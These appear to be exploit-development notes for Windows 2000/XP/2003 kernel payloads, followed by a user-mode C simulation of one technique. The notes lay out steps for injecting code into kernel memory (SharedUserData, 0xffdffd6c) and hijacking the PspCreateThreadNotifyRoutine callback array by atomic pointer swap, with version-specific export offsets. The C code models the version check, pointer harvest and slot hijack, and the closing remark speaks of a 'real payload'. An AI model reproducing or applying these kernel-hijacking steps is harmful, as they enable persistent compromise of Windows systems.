Things to try:

hal!KeGetCurrentIrql:
806bb354 0fb60524f0dfff   movzx eax,byte ptr [ffdff024]   ; KPCR+0x24 = current IRQL byte
806bb35b c3               ret

= Notify routine approach
- Problems: IRQL restrictions (the Ps*NotifyRoutine APIs must be called at PASSIVE_LEVEL; the exploit may be running higher)

Sub-approach #1:
- Find ntoskrnl.exe base
- Resolve nt!ExAllocatePool
- Resolve nt!PsSetLoadImageNotifyRoutine
- Resolve nt!KeLowerIrql
- Resolve nt!KeRaiseIrql
- Resolve hal!KeGetCurrentIrql
- Call ExAllocatePool
- Copy code to the buffer
- Call KeGetCurrentIrql, save the result
- Call KeLowerIrql (down to PASSIVE_LEVEL)
- Call PsSetLoadImageNotifyRoutine with the buffer ptr
- Call KeRaiseIrql (back to the saved IRQL)

Sub-approach #2:
- Find ntoskrnl.exe base
- Resolve nt!PsSetLoadImageNotifyRoutine
- Copy code to SharedUserData
- Call PsSetLoadImageNotifyRoutine with the SharedUserData ptr

Sub-approach #3: (good)
- Find ntoskrnl base
- Check if win2k by looking at SharedUserData+0x270 (NtMinorVersion: 0 = 2k, 1 = XP, 2 = 2k3; NtMajorVersion at +0x26c is 5 for all three)
- Find nt!PsSetCreateThreadNotifyRoutine (2k) or nt!PsRemoveCreateThreadNotifyRoutine (xp/2k3)
- Find PspCreateThreadNotifyRoutine (the internal callback array) from the export:
  - win2k:  PsSetCreateThreadNotifyRoutine+8    -> PspCreateThreadNotifyRoutine
  - winxp:  PsRemoveCreateThreadNotifyRoutine+6 -> PspCreateThreadNotifyRoutine
  - win2k3: PsRemoveCreateThreadNotifyRoutine+6 -> PspCreateThreadNotifyRoutine
- Copy code to 0xffdffd6c
- Interlocked-exchange the first PspCreateThreadNotifyRoutine entry with a ptr to the code at 0xffdffd6c (keep the old value so it can be restored)
- Try to recover the current thread safely (exploit dependent)
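Host-side model of sub-approach #3, added here as an example; it is not the note author's exploit code and does not touch a real kernel. It runs in user mode over a constructed fake SharedUserData page and a constructed fake export body so the version dispatch, the pointer harvest and the slot swap can be tested. The KUSER_SHARED_DATA offsets (NtMajorVersion at +0x26c, NtMinorVersion at +0x270) are real; the export+offset pairs are taken from the notes above, with "PsCreateThreadNotifyRoutine (2k)" read as the nt!PsSetCreateThreadNotifyRoutine export. Treating the dword at export+offset as the 32-bit operand that holds &PspCreateThreadNotifyRoutine, the 0x8055a2c0 array address, the 0x90 filler bytes and the helper names (choose_plan, harvest_array_va, hijack_slot, make_fake_sud) are assumptions for this example. The swap uses the GCC/Clang __atomic_exchange_n builtin in place of the kernel's InterlockedExchange.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Real KUSER_SHARED_DATA offsets (page at 0xffdf0000 kernel-side, 0x7ffe0000 user-side). */
#define NT_MAJOR_VERSION_OFF 0x26c
#define NT_MINOR_VERSION_OFF 0x270

/* Scratch address the notes use for the copied code. */
#define CODE_CAVE_VA 0xffdffd6cu

enum target_os { OS_UNSUPPORTED = 0, OS_WIN2K, OS_WINXP, OS_WIN2K3 };

struct notify_plan {
    enum target_os os;
    const char *anchor_export;  /* nt! export whose body references PspCreateThreadNotifyRoutine */
    uint32_t    ref_offset;     /* offset of that reference inside the export (from the notes) */
};

static uint32_t rd32(const uint8_t *p) { uint32_t v; memcpy(&v, p, 4); return v; }

/* Constructed stand-in for SharedUserData: zero page with only the version fields set. */
void make_fake_sud(uint8_t *sud, uint32_t major, uint32_t minor)
{
    memset(sud, 0, 0x300);
    memcpy(sud + NT_MAJOR_VERSION_OFF, &major, 4);
    memcpy(sud + NT_MINOR_VERSION_OFF, &minor, 4);
}

/* Step 1: read NtMajor/NtMinorVersion and pick export + offset.
 * Anything other than 5.0 / 5.1 / 5.2 is refused rather than guessed. */
struct notify_plan choose_plan(const uint8_t *sud)
{
    struct notify_plan p = { OS_UNSUPPORTED, NULL, 0 };
    uint32_t major = rd32(sud + NT_MAJOR_VERSION_OFF);
    uint32_t minor = rd32(sud + NT_MINOR_VERSION_OFF);
    if (major != 5) return p;
    switch (minor) {
    case 0: p.os = OS_WIN2K;  p.anchor_export = "PsSetCreateThreadNotifyRoutine";    p.ref_offset = 8; break;
    case 1: p.os = OS_WINXP;  p.anchor_export = "PsRemoveCreateThreadNotifyRoutine"; p.ref_offset = 6; break;
    case 2: p.os = OS_WIN2K3; p.anchor_export = "PsRemoveCreateThreadNotifyRoutine"; p.ref_offset = 6; break;
    default: break;
    }
    return p;
}

/* Step 2: pull &PspCreateThreadNotifyRoutine out of the anchor export.
 * ASSUMPTION: the dword at export+ref_offset is the imm32/disp32 holding the array address.
 * Returns 0 when the read would run past the bytes we were given. */
uint32_t harvest_array_va(const uint8_t *export_body, size_t body_len, uint32_t ref_offset)
{
    if ((size_t)ref_offset + 4 > body_len) return 0;
    return rd32(export_body + ref_offset);
}

/* Step 3: atomically swap one array slot for our handler and hand back the old entry
 * so the caller can put it back during recovery. */
uint32_t hijack_slot(uint32_t *slot, uint32_t handler_va)
{
    return __atomic_exchange_n(slot, handler_va, __ATOMIC_SEQ_CST);
}

int main(void)
{
    uint8_t sud[0x300];
    make_fake_sud(sud, 5, 1);                     /* constructed: pretend we are on XP */
    struct notify_plan plan = choose_plan(sud);

    /* Constructed fake export body: nop filler, then the dword at plan.ref_offset. */
    uint8_t export_body[16];
    uint32_t fake_array_va = 0x8055a2c0u;         /* assumed address, not a real symbol value */
    memset(export_body, 0x90, sizeof export_body);
    memcpy(export_body + plan.ref_offset, &fake_array_va, 4);

    uint32_t array_va = harvest_array_va(export_body, sizeof export_body, plan.ref_offset);

    uint32_t notify_array[8] = {0};               /* stands in for PspCreateThreadNotifyRoutine[] */
    uint32_t old = hijack_slot(&notify_array[0], CODE_CAVE_VA);

    printf("os=%d anchor=%s+%u array=%08x slot0 %08x -> %08x\n",
           plan.os, plan.anchor_export, plan.ref_offset, array_va, old, notify_array[0]);
    return 0;
}
```

The refusal path in choose_plan is the part worth keeping in a real payload: a 5.x check that silently falls through on anything else turns an unsupported target into a blind write through a bogus offset.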